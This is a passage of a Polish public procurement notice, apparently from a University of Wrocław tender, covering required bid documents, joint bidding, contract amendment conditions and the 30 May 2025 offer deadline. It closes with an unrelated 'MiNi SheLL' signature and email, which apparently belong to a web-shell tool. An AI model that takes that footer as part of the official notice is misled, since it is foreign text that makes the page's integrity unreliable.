nr 6 do SWZ;<br/>1.1.2. odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 <br/>pkt 4 uPzp oraz art. 7 ust. 1 ustawy sankcyjnej, sporządzonych nie wcześniej <br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do <br/>rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA SKŁADA SIĘ Z:<br/>1. Formularza oferty sporządzonego według wzoru stanowiącego Załącznik nr 1 do <br/>SWZ.<br/>2. Oświadczenia, o którym mowa w art. 125 ust. 1 uPzp - Załącznik nr 2 do SWZ.<br/>3 (jeżeli dotyczy) Pełnomocnictwa lub innego dokumentu potwierdzającego <br/>umocowanie do reprezentowania Wykonawcy dla osoby/osób podpisującej/cych ofertę <br/>odpowiednio zgodnie z pkt 7 lub 8 rozdziału XI SWZ.<br/>4 (jeżeli dotyczy) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę <br/>przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r. poz. 1913), Wykonawca, <br/>w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym <br/>i odpowiednio oznaczonym pliku – szczegóły opisane w pkt 6 rozdziału XI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. <br/>Wykonawcy występujący wspólnie (np. spółki cywilne, konsorcja), zgodnie z art. 58 <br/>ust. 2 uPzp zobowiązani są ustanowić pełnomocnika do reprezentowania Wykonawcy <br/>w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>8.2. Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z podmiotem <br/>występującym jako pełnomocnik.<br/>8.3. Pełnomocnictwo musi być opatrzone przez osobę/osoby uprawnioną(-e) do jego <br/>udzielenia tj.: zgodnie z formą reprezentacji każdego z Wykonawców kwalifikowanym <br/>podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Punkt 7.1. i 7.6 stosuje się odpowiednio.<br/>8.4. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność <br/>za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza wprowadzenie zmian do Umowy w stosunku do treści oferty, na <br/>podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez <br/>dopuszczenie możliwości zmian Umowy w formie pisemnego aneksu dotyczącego w <br/>szczególności: <br/>1) zmiany terminu realizacji Umowy w następujących sytuacjach:<br/>a) gdy konieczność zmiany jest spowodowana zaistnieniem niezawinionych przez <br/>Wykonawcę okoliczności, których nie można było przy dołożeniu należytej staranności <br/>przewidzieć w chwili zawarcia Umowy, a które uniemożliwiają prawidłowe wykonanie <br/>przedmiotu Umowy w terminach określonych w umowie; <br/>b) działania Siły Wyższej określonej w § 14 Umowy, mającej bezpośredni wpływ na <br/>terminowość wykonania usługi. W takim przypadku przedłużenie terminu wykonania <br/>Umowy następuje o czas odpowiadający okresowi wystąpienia Siły Wyższej;<br/>c) w przypadku utraty przez Zamawiającego źródła finansowania zamówienia w całości <br/>lub w części, a także w przypadku przesunięcia terminu finansowania zamówienia;<br/>d) zmian po zawarciu Umowy przepisów prawa lub wprowadzenia nowych przepisów <br/>prawa, w tym aktów prawa obowiązujących u Zamawiającego o charakterze <br/>wewnętrznym, lub zmiany lub wprowadzenia nowej bezwzględnie obowiązującej <br/>normy powodującej konieczność zmiany, modyfikacji lub odstępstwa w odniesieniu do <br/>przedmiotu Umowy, w zakresie mającym wpływ na realizację przedmiotu Umowy. <br/>2) rezygnacji z Podwykonawcy lub zmiany Podwykonawcy, przy czym, jeżeli zmiana albo <br/>rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał się, <br/>na zasadach określonych w art. 118 ust. 1 uPzp, w celu wykazania spełnienia warunków <br/>udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że <br/>proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie <br/>mniejszym niż Podwykonawca, na którego zasoby Wykonawca powołał się w trakcie <br/>postępowania o udzielenie zamówienia. Przepis art. 122 uPzp stosuje się odpowiednio.<br/>2. Aktualizacja danych Wykonawcy poprzez zmianę nazwy, zmianę adresu siedziby nie stanowi <br/>zmiany Umowy wymagającej aneksu.<br/>3. Ewentualna zmiana Umowy może nastąpić z uwzględnieniem wpływu, jaki wywiera wystąpienie <br/>okoliczności uzasadniającej modyfikację na dotychczasowy kształt zobowiązania umownego.<br/>Każda ze Stron Umowy może żądać zmiany, o których mowa powyżej, poprzez złożenie <br/>pisemnego wniosku uzasadniającego okoliczności związane z <br/>wystąpieniem zmiany mającej wpływ na należyte wykonanie Umowy.<br/>5. Zamawiający może nie wyrazić zgody na proponowaną zmianę Wykonawcy. Możliwość <br/>wprowadzenia zmian nie stanowi jednocześnie zobowiązania Zamawiającego do wyrażenia <br/>takiej zgody, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceeding</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com